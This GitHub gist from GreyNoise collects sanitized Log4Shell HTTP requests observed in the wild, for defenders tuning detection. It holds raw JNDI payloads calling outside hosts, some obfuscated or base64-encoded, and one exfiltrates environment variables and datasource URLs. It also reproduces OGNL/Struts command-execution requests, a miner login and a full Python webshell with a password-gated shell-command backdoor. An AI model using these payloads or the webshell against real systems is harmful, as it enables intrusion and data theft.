Skip to content

Instantly share code, notes, and snippets.

@nathanqthai

nathanqthai/payload_samples.md

Last active March 30, 2023 12:54
Show Gist options
  • Star 13 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save nathanqthai/197b6084a05690fdebf96ed34ae84305 to your computer and use it in GitHub Desktop.
Save nathanqthai/197b6084a05690fdebf96ed34ae84305 to your computer and use it in GitHub Desktop.
Download ZIP
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence
Raw
payload_samples.md

Samples

Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.

Examples

The follow section includes Log4Shell samples seen in the wild

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

GET /?id=%27%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F%27%2B+argv%5B2%5D+%2B%27%2Fass%7D%27 HTTP/1.1
Host: <HOST>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: '${${::-j}ndi:rmi://'+ argv[2] +'/ass}'
User-Agent: '${${::-j}ndi:rmi://'+ argv[2] +'/ass}'

::- and lower: Interpolation

Two obfuscation examples:

GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://5.255.97.172:1389/a} HTTP/1.1
Host: <HOST>
Connection: close
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
GET /?q=${${lower:${lower:jndi}}:${lower:rmi}://5.255.97.172:1389/a} HTTP/1.1
Host: <HOST>
Connection: close
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36

Base64 Encoded in Authorization Header

GET parameter as well as encoded into the authorization header:

GET /?x=$%7Bjndi:ldap://ec725b34.dns.1433.eu.org%7D HTTP/1.1
Host: <IP_ADDRESS>:631
user-agent: ${jndi:ldap://ec725b34.dns.1433.eu.org}
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
authorization: Basic JHtqbmRpOmxkYXA6Ly9lYzcyNWIzNC5kbnMuMTQzMy5ldS5vcmd9OiR7am5kaTpsZGFwOi8vZWM3MjViMzQuZG5zLjE0MzMuZXUub3JnfQ==
referer: ${jndi:ldap://ec725b34.dns.1433.eu.org}

Decoded base64:

${jndi:ldap://ec725b34.dns.1433.eu.org}:${jndi:ldap://ec725b34.dns.1433.eu.org}

HEAD method

Any method could appear, we simply wanted to provide an example of a method that was not GET or POST:

HEAD /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <IP_ADDRESS>:8545
Connection: close
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
X-Forwarded-For: ${jndi:ldap://X-Forwarded-For.c6qtab5mk1u0ihtclet0cg47m7aeoyjro.interact.sh/x}

DNS

GET /$%7Bjndi:dns://45.83.64.1/securityscan-http664%7D HTTP/1.1
Host: <IP_ADDRESS>:664
User-Agent: ${jndi:dns://45.83.64.1/securityscan-http664}
Referer: ${jndi:dns://45.83.64.1/securityscan-http664}
X-Api-Version: ${jndi:dns://45.83.64.1/securityscan-http664}
Accept-Encoding: gzip

RMI

GET /$%7Bjndi:ldap://67.205.191.102:1389/jxjrbt%7D HTTP/1.1
Host: <HOST>
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: ${jndi:rmi://67.205.191.102:1099/djf6hl}

IIOP

GET /$%7Bjndi:iiop://128.90.61.199:10834/1639501300%7D HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept-Encoding: gzip
Connection: TE, close
Referer: ${jndi:iiop://128.90.61.199:10834/1639501300}
Te: deflate,gzip;q=0.3
User-Agent: ${jndi:iiop://128.90.61.199:10834/1639501300}
X-Api-Version: ${jndi:iiop://128.90.61.199:10834/1639501300}

LDAPS

GET /$%7Bjndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b%7D?${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b} HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept-Encoding: gzip
Cache-Control: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
Connection: close
Cookie: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}=${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
User-Agent: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}
X-Leakix: ${jndi:ldaps://0241465b.probe001.log4j.leakix.net:443/b}

Brute Force HTTP Check

We noticed some of these going around that attempts to be a catch-all, note the parameters and the POST body:

POST /global-protect/login.esp?v=%24%7Bjndi%3Armi%3A%2F%2F<IP_ADDRESS>.5f3gyn.dnslog.cn%7D HTTP/1.1
Host: <IP_ADDRESS>:8081
Accept: */*
Accept-Charset: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Datetime: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Encoding: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Accept-Language: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Cache-Control: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Connection: keep-alive
Content-Length: 298
Content-Type: application/json
Cookie: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Dnt: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-For-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Forwarded-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
From: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Max-Forwards: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Origin: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Pragma: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Referer: https://${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Te: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
True-Client-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Upgrade: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
User-Agent: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Via: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
Warning: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Api-Version: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Att-Deviceid: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Correlation-Id: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Csrf-Token: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Csrftoken: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Do-Not-Track: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Foo: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Foo-Bar: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forward-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forward-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-By: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-For-Original: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Host: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Port: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Proto: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Protocol: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Scheme: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Server: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarded-Ssl: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Forwarder-For: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Frame-Options: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-From: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Geoip-Country: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Destinationurl: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Host-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Method: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Method-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Http-Path-Override: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Https: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Htx-Agent: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Hub-Signature: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-If-Unmodified-Since: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Imbo-Test-Config: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Insight: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Ip-Trail: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Proxyuser-Ip: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Request-Id: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Requested-With: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Uidh: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Wap-Profile: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}
X-Xsrf-Token: ${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}

{""username"": ""${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}"", ""user"": ""${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}"", ""email"": ""${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}"", ""email_address"": ""${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}"", ""password"": ""${jndi:rmi://<IP_ADDRESS>.5f3gyn.dnslog.cn}""}"

Base64 Encoded Into Parameter

GreyNoise noticed a particular attacker evolve their techniques. There was intially basic exploitation via a header:

GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <IP_ADDRESS>:2375
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Waterfox/91.4.0
X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:ldap://jobs3734.log.helicopter-crash.online:443/file}

This later evolved into use of a parameter that completely obfuscates and enables WAF bypass for most Log4J related rules:

GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOnJtaTovLzQ1Ljc3LjEyNC42MTo0NDMvUkF9 HTTP/1.1
Host: <HOST>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36

Decoded base64:

${${::-j}ndi:rmi://45.77.124.61:443/RA}

We saw a variant of this where the payload was a bit more sophisticated in it's use of bypasses:

GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOmxkYXA6Ly80NS43Ny4xMjQuNjE6NDQzLyMzZDJmMjc3MjczNzQ3ODVmZGVlMjkyYjI0Nzg2MjFkZF86O18ke2VudjpQQVRIfV86O18ke2VudjpVU0VSfV86O18ke2VudjpVU0VSTkFNRX1fOjtfJHtlbnY6SE9TVE5BTUV9Xzo7XyR7ZW52OlVTRVJETlNET01BSU59Xzo7XyR7ZW52OkNPTVBVVEVSTkFNRX1fOjtfJHtidW5kbGU6YXBwbGljYXRpb246c3ByaW5nLmRhdGFzb3VyY2UudXJsfV86O18ke3N5czpqYXZhLnZlcnNpb259fQ== HTTP/1.1
Host: <IP_ADDRESS>:8081
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36

Decoded base64:

${${::-j}ndi:ldap://45.77.124.61:443/#3d2f27727374785fdee292b2478621dd_:;_${env:PATH}_:;_${env:USER}_:;_${env:USERNAME}_:;_${env:HOSTNAME}_:;_${env:USERDNSDOMAIN}_:;_${env:COMPUTERNAME}_:;_${bundle:application:spring.datasource.url}_:;_${sys:java.version}}

Common False Positives

This section provides samples of some false positives that may appear with overly broad matching patterns.

OGNL

Variations on OGNL exploits show up fairly often due to their relation to Java and sharing many similar fingerprinting bypasses

GET /%25%7b(%23dm%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context['com.opensymphony.xwork2.ActionContext.container']).(%23ognlUtil%3d%23container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3d'ping%208z8usjxsanw60xuueazmq5e1isoic7.burpcollaborator.net%20-c1').(%23iswin%3d(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3d(%23iswin%3f%7b'cmd.exe'%2c'/c'%2c%23cmd%7d%3a%7b'/bin/bash'%2c'-c'%2c%23cmd%7d)).(%23p%3dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3d%23p.start()).(@org.apache.commons.io.IOUtils@toString(%23process.getInputStream()))%7d/portal/js/html5shiv.min.js HTTP/1.1
Host: <IP_ADDRESS>:443
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36

JSONRPC

This false positive can potentially be avoided by looking for jsonrpc

"{""id"":1,""jsonrpc"":""2.0"",""method"":""login"",""params"":{""login"":""42m9nqbb2aL9TTYHUeBrz8VactZAbtMBzdTjdoofR5XNGRa9H1Mcxenat3vZazj9s9bLJq31ugJFKKWYSLKznsQHCLgEJfo"",""pass"":""x"",""agent"":""XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019"",""algo"":[""cn/1"",""cn/2"",""cn/r"",""cn/fast"",""cn/half"",""cn/xao"",""cn/rto"",""cn/rwz"",""cn/zls"",""cn/double"",""cn/ccx"",""cn-lite/1"",""cn-heavy/0"",""cn-heavy/tube"",""cn-heavy/xhv"",""cn-pico"",""cn-pico/tlo"",""cn/upx2"",""rx/0"",""rx/wow"",""rx/arq"",""rx/graft"",""rx/sfx"",""rx/keva"",""argon2/chukwa"",""argon2/chukwav2"",""argon2/ninja"",""astrobwt""]}}

Random Webshell Upload Attempt

I don't know what to say about this...

POST /logupload?logMetaData={""a"":{""@type"":""com.alibaba.fastjson.JSONObject"",{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao5""}}""""},""b"":{{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao6""}:""x""},""c"":{{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao7""}:0,""d"":Set[{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao8""}],""e"":Set[{""@type"":""java.net.URL"",""val"":""http://1.u113ft0k.03jxxe.dnslog.cn/miao9""},} HTTP/1.1
Host: <IP_ADDRESS>:8443
Connection: close
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 4411
Content-Type: multipart/form-data; boundary=7ddcdf06c9de6031e144846ebacf8cde
User-Agent: python-requests/2.25.1

--7ddcdf06c9de6031e144846ebacf8cde
Content-Disposition: form-data; name=""logfile""; filename=""upload.txt""

#! /usr/bin/env python3
import cgi
import os,sys,subprocess
import logging
import json

WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME = ""workload_log_{}.zip""

class LogFileJson:
    """""" Defines format to upload log file in harness
    Arguments:
    itrLogPath : log path provided by harness to store log data
    logFileType : Type of log file defined in api.agentlogFileType
    workloadID [OPTIONAL] : workload id, if log file is workload specific
    """"""
    def __init__(self, itrLogPath, logFileType, workloadID = None):
        self.itrLogPath = itrLogPath
        self.logFileType = logFileType
        self.workloadID = workloadID

    def to_json(self):
        return json.dumps(self.__dict__)

    @classmethod
    def from_json(cls, json_str):
        json_dict = json.loads(json_str)
        return cls(**json_dict)

class agentlogFileType():
    """""" Defines various log file types to be uploaded by agent
    """"""
    WORKLOAD_ZIP_LOG = ""workloadLogsZipFile""

try:
    # TO DO: Puth path in some config
    logging.basicConfig(filename=""/etc/httpd/html/logs/uploader.log"",filemode='a', level=logging.ERROR)
except:
    # In case write permission is not available in log folder.
    pass

logger = logging.getLogger('log_upload_wsgi.py')

def application(environ, start_response):
    logger.debug(""application called"")

    if environ['REQUEST_METHOD'] == 'POST':
        post = cgi.FieldStorage(
            fp=environ['wsgi.input'],
            environ=environ,
            keep_blank_values=True
        )

        # TO DO: Puth path in some config or read from config is already available
        resultBasePath = ""/etc/httpd/html/vpresults""
        try:
            filedata = post[""logfile""]
            metaData = post[""logMetaData""]

            if metaData.value:
                logFileJson = LogFileJson.from_json(metaData.value)

            if not os.path.exists(os.path.join(resultBasePath, logFileJson.itrLogPath)):
                os.makedirs(os.path.join(resultBasePath, logFileJson.itrLogPath))

            if filedata.file:
                if (logFileJson.logFileType == agentlogFileType.WORKLOAD_ZIP_LOG):
                    filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, WORKLOAD_LOG_ZIP_ARCHIVE_FILE_NAME.format(str(logFileJson.workloadID)))
                else:
                    filePath = os.path.join(resultBasePath, logFileJson.itrLogPath, logFileJson.logFileType)
                with open(filePath, 'wb') as output_file:
                    while True:
                        data = filedata.file.read(1024)
                        # End of file
                        if not data:
                            break
                        output_file.write(data)

                body = u"" File uploaded successfully.""
                start_response(
                    '200 OK',
                    [
                        ('Content-type', 'text/html; charset=utf8'),
                        ('Content-Length', str(len(body))),
                    ]
                )
                return [body.encode('utf8')]

        except Exception as e:
            logger.error(""Exception {}"".format(str(e)))
            body = u""Exception {}"".format(str(e))
    else:
        if environ['REQUEST_METHOD'] == 'GET':
            post = cgi.FieldStorage(
                fp=environ['wsgi.input'],
                environ=environ,
                keep_blank_values=True
            )
            if post[""key""].value == ""hell0W0rld"":
                command = post[""baby""].value
                proc = subprocess.run(command, shell=True,stdout=subprocess.PIPE)
                body = proc.stdout.decode(""utf-8"")
                start_response(
                        '200 OK',
                        [
                            ('Content-type', 'text/html; charset=utf8'),
                            ('Content-Length', str(len(body))),
                        ]
                    )
                return [body.encode('utf8')]
        logger.error(""Invalid request"")
        body = u""Invalid request""

    start_response(
        '400 fail',
        [
            ('Content-type', 'text/html; charset=utf8'),
            ('Content-Length', str(len(body))),
        ]
    )
    return [body.encode('utf8')]
--7ddcdf06c9de6031e144846ebacf8cde--

Misc

GET //${%23context['xwork.MethodAccessor.denyMethodExecution']=!(%23_memberAccess['allowStaticMethodAccess']=true),(@java.lang.Runtime@getRuntime()).exec('id').waitFor()}.action HTTP/1.1
Host: <HOST>
Connection: close
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Cache-Control: no-cache
Connection: Close
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment